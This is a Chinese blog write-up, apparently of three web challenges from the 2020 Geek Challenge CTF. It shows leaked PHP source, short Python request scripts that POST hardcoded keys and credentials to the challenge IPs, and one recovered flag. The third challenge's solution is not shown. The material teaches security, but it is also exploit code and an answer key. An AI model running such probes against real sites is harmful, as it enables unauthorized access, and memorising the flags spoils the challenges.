avatar

CTF-2020年极客大挑战

Web

EZwww


根据hint,发现源码泄露

1
http://47.100.46.169:3901/www.zip

解压之后代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<html>
<head>
<title>Lola's website1.0</title>
</head>
<body>
<?php echo '<h1>welcome to my website</h1>'; ?>
<?php echo '<p>i will never forget to backup my website......</p>'; ?>
<?php echo '<img src="img/lola.gif" alt="welcome~"/>'; ?>
</body>
</html>
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
//this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

发现只要以POST的形式a=base64_decode('c3ljbDB2ZXI=')成立,即可输出flag

Exploit如下

1
2
3
4
5
6
7
8
9
10
11
import requests
import base64
secret = 'c3ljbDB2ZXI='
ip = '47.100.46.169:3901'
url = 'http://%s/index.php' % (ip)
data = {
'a' : base64.b64decode(secret)
}
print("POST %s\t%s" % (url,str(data)))
response = requests.post(url,data=data)
print(response.text)

回显

1
2
3
4
5
6
7
8
<html>
<head>
<title>Lola's website1.0</title>
</head>
<body>
<br><h1>This website has been backed up</h1><br> dont forget to post something important to get what you want ~QAQ~ <br><br><img src="img/lola.gif" alt="welcome~"/> </body>
</html>
<p>SYC{Backup_1s_4_good_h4bit_l0l}</p>

SYC{Backup_1s_4_good_h4bit_l0l}

刘壮的黑页


一打开页面,全黑的,👴傻了

立即修改背景,给它洗白白

!(2.png)[2.png]

在底部发现php代码

1
2
3
4
5
6
7
8
<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
echo $flag;
}

在post发包时带着GET的参数即可

Exploit如下

1
2
3
4
5
6
7
8
9
10
import requests
ip = '106.54.75.217:8080'
username = 'admin'
password = 'syclover'
url = "http://%s/?username=%s" % (ip,username)
data = {
'passwd': password
}
response = requests.post(url,data=data)
print(response.text)

Welcome


通过测试发现GET请求被ban了

尝试通过POST请求,发现可以得到页面源码,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 <?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {

if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
show_source(__FILE__);
}
else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
phpinfo(); // collect information from phpinfo!
}
}
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2020/10/22/CTF-2020%E5%B9%B4%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
打赏
  • 微信
    微信
  • 支付宝
    支付宝

评论